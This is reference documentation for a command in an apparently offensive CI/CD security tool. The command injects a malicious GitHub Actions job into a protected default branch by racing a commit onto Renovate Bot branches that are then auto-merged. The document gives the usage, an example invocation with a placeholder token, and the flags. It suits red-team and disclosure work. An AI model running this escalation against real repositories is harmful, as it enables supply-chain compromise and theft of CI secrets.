Privesc

pipeleek gh renovate privesc

Inject a malicious workflow job into the protected default branch abusing Renovate Bot's access

Synopsis

Inject a job into the GitHub Actions workflow of the repository's default branch by adding a commit (race condition) to a Renovate Bot branch, which is then auto-merged into the main branch. Assumes the Renovate Bot has owner/admin access whereas you only have write access. See https://blog.compass-security.com/2025/05/renovate-keeping-your-updates-secure/

1	`pipeleek gh renovate privesc [flags]`

Examples

1	`pipeleek gh renovate privesc --token ghp_xxxxx --github https://api.github.com --repo-name owner/myproject --renovate-branches-regex 'renovate/.*'`

Options

  -h, --help                             help for privesc
      --monitoring-interval string       The interval to check for new Renovate branches (default: '1s') (default "1s")
  -b, --renovate-branches-regex string   The branch name regex expression to match the Renovate Bot branch names (default: 'renovate/.*') (default "renovate/.*")
  -r, --repo-name string                 The repository to target in format owner/repo

Options inherited from parent commands

      --color              Enable colored log output (auto-disabled when using --logfile) (default true)
      --config string      Config file path. Example: ~/.config/pipeleek/pipeleek.yaml
  -g, --github string      GitHub API base URL (default "https://api.github.com")
      --ignore-proxy       Ignore HTTP_PROXY environment variable
      --json               Use JSON as log output format
      --log-level string   Set log level globally (debug, info, warn, error). Example: --log-level=warn
  -l, --logfile string     Log output to a file
  -t, --token string       GitHub Personal Access Token
  -v, --verbose            Enable debug logging (shortcut for --log-level=debug)